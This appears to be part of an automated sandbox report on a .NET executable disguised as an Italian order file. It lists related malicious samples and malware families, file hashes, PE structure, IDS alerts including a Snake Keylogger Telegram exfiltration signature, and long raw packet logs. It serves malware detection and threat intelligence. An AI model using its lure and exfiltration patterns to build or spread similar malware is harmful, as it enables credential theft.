	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://shorten.so/fVj82	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	http://hrpibzdeam.xyz/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://tg.666986.xyz/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	Handler.exe	Get hash	malicious	DanaBot, PureLog Stealer, Vidar	Browse	149.154.167.99
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	U23BGA2025REQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	Notice_bill_of_lading_number_HAWB_771434342326.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
3b5074b1b5d032e5620f69f9f700ff0e	imYD7uep15.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	149.154.167.220
	imYD7uep15.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	149.154.167.220
	ap.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	vXn4pan2US.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Oficio-dedidas-cautelares-delcaraciones-vencidas2021-2022 (1).js	Get hash	malicious	Njrat	Browse	149.154.167.220
	AUTO SAA.988.2024 de fecha 11-12-2024, EXP 68861-483-2007.bat	Get hash	malicious	AsyncRAT	Browse	149.154.167.220
	shipping documents.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	exclude.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	c2.hta	Get hash	malicious	Unknown	Browse	149.154.167.220
	doc.bat	Get hash	malicious	Unknown	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.726889282020205
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
File size:	199'168 bytes
MD5:	2d080f1e0be3ec95d49f138a5e9c4d4f
SHA1:	22c49e1c1202336494504a101c1de5ac112d37e5
SHA256:	c44d3e15034c029b6a3fb3571c9bfca998863ba209c5c354edce1bf0316a9e42
SHA512:	2c0edebcd8cdad34507ae953d9e0f985aaa4e0dfb25d7c07ca29794c896e0fbf726a69dfee1e4e6b96741c625a99227e83b4254df1352587ffa90c0ac60ada6b
SSDEEP:	6144:EMKbABCaM6LGR7leDRq5KxYJTQxhrzVMRq2:2bSCtTQeq2
TLSH:	0D14292027ED8A16D2FFA778E4B205084BB5BC47B176DB4E8A9034E91837701DD917BB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#\.g.....................0........... ........@.. .......................`............`................................

File Icon


Icon Hash:	1270d6c4c692c2c4

Static PE Info

General

Entrypoint:	0x42f6fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67865C23 [Tue Jan 14 12:44:19 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f6a4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x2cba	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x34000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2d704	0x2d800	96ad43695a23b7b3af22e882ddc6d197	False	0.40616951407967034	data	5.755390626239876	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0x2cba	0x2e00	2251286319027062151d615ae4092069	False	0.15973165760869565	data	3.5242987730068	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x34000	0xc	0x200	e3aff6ccdd30c8477b686214c6d4d28e	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x30130	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	0.11255186721991702
RT_GROUP_ICON	0x326d8	0x14	data	1.15
RT_VERSION	0x326ec	0x3e4	data	0.4106425702811245
RT_MANIFEST	0x32ad0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T13:10:29.760764+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49852	193.122.6.168	80	TCP
2025-01-16T13:10:30.729512+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49852	193.122.6.168	80	TCP
2025-01-16T13:10:31.291439+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49864	104.21.48.1	443	TCP
2025-01-16T13:10:32.010791+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49870	193.122.6.168	80	TCP
2025-01-16T13:10:38.921625+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49926	104.21.48.1	443	TCP
2025-01-16T13:10:44.827849+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49962	149.154.167.220	443	TCP
2025-01-16T13:10:45.409321+0100	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.6	49962	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 13:10:01.570156097 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:01.575257063 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:01.575373888 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:01.576018095 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:01.580841064 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550004005 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550055981 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550088882 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550121069 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550174952 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550172091 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.550209999 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.550266981 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.552473068 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.806407928 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806497097 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806509972 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806534052 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806550026 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806565046 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806581020 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.806580067 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.806631088 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.807259083 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.807290077 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.807351112 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.807560921 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.807585001 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:02.807617903 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:02.854566097 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.063179970 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063224077 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063249111 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063263893 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063280106 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063283920 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.063296080 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063325882 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063347101 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.063348055 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.063347101 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.063411951 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.064142942 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.064179897 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.064214945 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.064233065 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.064246893 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.064282894 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.064292908 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.064991951 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.065046072 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.153825998 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.198297977 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.319699049 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.319757938 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.319792986 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.319823027 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.319825888 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.319866896 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.319895029 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.319911003 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.319963932 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.320035934 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320069075 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320101976 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320118904 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.320135117 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320168972 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320199013 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.320867062 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320900917 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320924997 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.320935965 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320967913 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.320986986 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.321002007 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.321048975 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.321702003 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.321734905 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.321768045 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.321783066 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.321800947 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.321855068 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.410175085 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.464879036 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576001883 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576073885 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576108932 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576132059 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576143026 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576178074 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576194048 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576211929 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576246023 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576261044 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576297998 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576333046 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576347113 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576704979 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576738119 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576761961 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576790094 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576822042 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576839924 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576858044 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576890945 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576904058 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.576925993 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.576978922 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.577588081 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577621937 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577653885 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577666044 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.577687979 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577721119 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577745914 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.577754021 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577788115 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.577800989 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.578424931 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578458071 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578476906 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.578493118 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578528881 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578546047 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.578561068 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578593969 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578607082 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.578628063 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.578672886 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:03.579191923 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:03.620183945 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158282042 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158324957 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158360958 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158392906 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158427000 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158426046 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158467054 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158477068 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158510923 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158544064 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158545971 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158593893 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158596992 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158627987 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158658981 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158679008 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158691883 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158724070 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158746958 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158757925 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158791065 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158812046 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158823013 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158876896 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158876896 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.158947945 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.158981085 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159006119 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159013987 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159048080 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159071922 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159080982 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159115076 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159138918 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159147024 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159178972 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159204960 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159213066 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159245014 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159262896 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159276962 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159310102 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159349918 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159368992 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159401894 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159419060 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159435034 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159467936 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159488916 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159502983 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159533978 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159555912 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159568071 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159600973 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159634113 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159637928 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159666061 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159679890 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159699917 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159732103 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159755945 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159765959 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159797907 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159816027 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159831047 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159862041 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159884930 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159894943 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159914970 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159926891 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159960985 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.159981012 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.159992933 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.160026073 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.160047054 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.160058022 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.160092115 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.160115004 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.160125971 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.160203934 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.165072918 CET	80	49709	160.22.121.182	192.168.2.6
